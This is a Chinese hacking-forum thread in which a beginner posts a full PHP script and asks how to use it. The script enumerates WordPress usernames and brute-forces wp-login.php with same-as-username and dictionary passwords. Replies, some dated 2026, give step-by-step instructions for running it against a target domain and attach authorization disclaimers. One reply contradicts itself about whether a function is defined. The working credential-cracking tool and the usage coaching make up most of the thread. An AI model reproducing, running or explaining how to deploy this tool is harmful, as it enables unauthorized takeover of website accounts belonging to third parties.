查看: 4015|回复: 7

求教脚本怎么使用

[复制链接]
发表于 2015-12-16 18:01:15 | 显示全部楼层 |阅读模式
悬赏10i币已解决
本人小白一个  经常看见一些大牛发帖  里面都有一些脚本  但不会用求教  
比如这样的
<?php
  
set_time_limit(0);
$domain = $argv[1];
  
//获取用户名
for ($i=1; $i <= 10; $i++) {
  
    $url = $domain."/?author=".$i;
    $response = httprequest($url,0);
    if ($response == 404) {
        continue;
    }
    $pattern = "/author\/(.*)\/feed/";
    preg_match($pattern, $response, $name);
    $namearray[] = $name[1];
}
  
echo "共获取用户".count($namearray)."名用户\n";
  
echo "正在破解用户名与密码相同的用户:\n";
  
$crackname = crackpassword($namearray,"same");
  
$passwords = file("pass.txt");
  
echo "正在破解弱口令用户:\n";
  
if ($crackname) {
    $namearray = array_diff($namearray,$crackname);
}
  
crackpassword($namearray,$passwords);
  
function crackpassword($namearray,$passwords){
    global $domain;
    $crackname = "";
    foreach ($namearray as $name) {
        $url = $domain."/wp-login.php";
        if ($passwords == "same") {
            $post = "log=".urlencode($name)."&pwd=".urlencode($name)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1";
            $pos = strpos(httprequest($url,$post),'div id="login_error"');
            if ($pos === false) {
                echo "$name $name"."\n";
                $crackname[] = $name;
            }
        }else{
            foreach ($passwords as $pass) {
                $post = "log=".urlencode($name)."&pwd=".urlencode($pass)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1";
                $pos = strpos(httprequest($url,$post),'div id="login_error"');
                if ($pos === false) {
                    echo "$name $pass"."\n";
                }
            }
        }
    }
    return $crackname;
}
  
  
function httprequest($url,$post){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$url");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
  
    if($post){
        curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
  
    $output = curl_exec($ch);
    $httpcode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
    curl_close($ch);
  
  
    if ($httpcode == 404) {
        return 404;
    }else{
        return $output;
    }
}
?>

最佳答案

查看完整内容

根据脚本的类型来用。 比如你这个是php的,本地要有php的环境,cmd下运行,有参数要求就要加参数
回复

使用道具 举报

发表于 2015-12-16 18:01:16 | 显示全部楼层
根据脚本的类型来用。
比如你这个是php的,本地要有php的环境,cmd下运行,有参数要求就要加参数

点评

请问有详细的教程吗?  详情 回复 发表于 2015-12-17 20:16
回复

使用道具 举报

发表于 2015-12-17 08:44:23 | 显示全部楼层
wp博客的密码爆破啊。

点评

给你发qq不回我。。。  详情 回复 发表于 2015-12-17 18:53
回复

使用道具 举报

 楼主| 发表于 2015-12-17 18:53:01 | 显示全部楼层
C4r1st 发表于 2015-12-17 08:44
wp博客的密码爆破啊。

给你发qq不回我。。。
回复

使用道具 举报

 楼主| 发表于 2015-12-17 20:16:13 | 显示全部楼层
90_ 发表于 2015-12-16 18:01
根据脚本的类型来用。
比如你这个是php的,本地要有php的环境,cmd下运行,有参数要求就要加参数 ...

请问有详细的教程吗?
回复

使用道具 举报

发表于 2026-5-20 11:20:00 | 显示全部楼层

Re: 求教脚本怎么使用

这是针对 WordPress 站点的用户名枚举和弱口令测试脚本,需要在命令行下运行 PHP。 **使用方法:** 1. 将代码保存为一个 `.php` 文件,比如 `wp_crack.php`。 2. 在同一目录下创建一个 `pass.txt` 文件,每行一个密码(用于弱口令测试)。 3. 打开终端(命令行),执行: ``` php wp_crack.php 目标网站域名 ``` 例如:`php wp_crack.php **注意:** - 该脚本会尝试枚举 WordPress 用户并测试密码,**仅限用于你自己拥有权限的网站或已获得明确授权的测试**,非法使用可能违反法律。 - 脚本依赖 PHP 的 curl 扩展,请确保已安装。 - 运行前建议先确认目标站点是否允许此类测试。 另外,脚本中的 `httprequest` 函数没有定义?看起来是依赖你环境里已有的函数,或者也可以把 `curl_` 相关代码直接整合进去(你贴出的代码里已经有 `function httprequest` 了,应该是完整的)。如果报错,检查一下 PHP 版本和 curl 是否开启。 希望这个回复能帮到你,有问题继续交流。
回复

使用道具 举报

发表于 2026-6-17 17:30:01 | 显示全部楼层

Re: 求教脚本怎么使用

这个脚本是 PHP 写的,需要在有 PHP 环境的命令行里运行。你把代码保存成一个 .php 文件(比如 crack.php),然后打开终端(Windows 的 cmd 或 PowerShell,Linux/macOS 的终端),用类似下面的命令执行: ```bash php crack.php ``` 脚本里的 `$argv[1]` 就是你要传入的域名参数。另外脚本还会读取当前目录下的 `pass.txt` 文件作为密码字典,所以最好也准备一个。 不过友情提醒:这个脚本是用来尝试登录 WordPress 后台的,常用于测试自己网站的弱口令,但未经授权去测试别人的网站是不道德的,还可能触犯法律。如果你是拿自己的站练手,记得只在授权范围内使用。
回复

使用道具 举报

发表于 2026-6-17 19:50:00 | 显示全部楼层

Re: 求教脚本怎么使用

你这个脚本是一个 PHP 命令行工具,主要是用来检测 WordPress 站点的弱口令或用户名密码相同的情况。简单说几个步骤帮你上手: 1. **准备环境**:你需要一台能运行 PHP 的电脑或服务器(Windows 下装 XAMPP,Linux/Mac 自带 PHP 或装一下就行)。 2. **保存脚本**:把上面代码复制到一个文件,比如 `crack.php`。 3. **准备密码字典**:脚本里调用了 `pass.txt`,你需要在同一目录下放一个文本文件,每行一个密码,用来测试弱口令。 4. **运行命令**:打开终端(命令行),切换到脚本所在目录,输入: ``` php crack.php 目标网址 ``` 例如 `php crack.php 注意:这个脚本会不断尝试登录目标网站,**可能违法**。如果你没有获得网站所有者的明确授权,请不要使用。技术交流区建议用于学习 PHP 编程逻辑,而不是实际攻击。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-7 10:29 , Processed in 0.029661 second(s), 17 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部